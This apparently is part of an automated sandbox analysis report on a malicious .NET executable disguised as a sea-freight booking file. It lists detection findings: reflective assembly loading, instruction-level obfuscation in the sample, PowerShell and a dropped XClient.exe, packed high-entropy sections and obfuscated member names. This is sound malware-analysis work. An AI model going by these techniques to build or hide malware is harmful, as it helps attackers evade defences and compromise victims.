Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC87E8 pushad ; iretd	1_2_02FC87F5
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE2CE8 pushfd ; iretd	10_2_05CE2CE9
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE2C90 push eax; iretd	10_2_05CE2C91
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D42CD push ebx; ret	13_2_042D42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D2CA5 push 04B80721h; retf	13_2_042D2CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D5DD0 push esp; ret	13_2_042D5DE3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D3ACD push ebx; retf	13_2_042D3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414634D push eax; ret	19_2_04146361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045F629D push eax; ret	21_2_045F6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045F2C5C push 04B80753h; retf	21_2_045F2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068E62CD push eax; ret	25_2_068E6381
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FC590 pushad ; ret	28_2_056FC591
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056F7460 push eax; mov dword ptr [esp], ecx	28_2_056F7464

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Static PE information: section name: .text entropy: 7.978661790486835
Source: BhTdjGetAH.exe.1.dr	Static PE information: section name: .text entropy: 7.978661790486835
Source: XClient.exe.10.dr	Static PE information: section name: .text entropy: 7.978661790486835

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
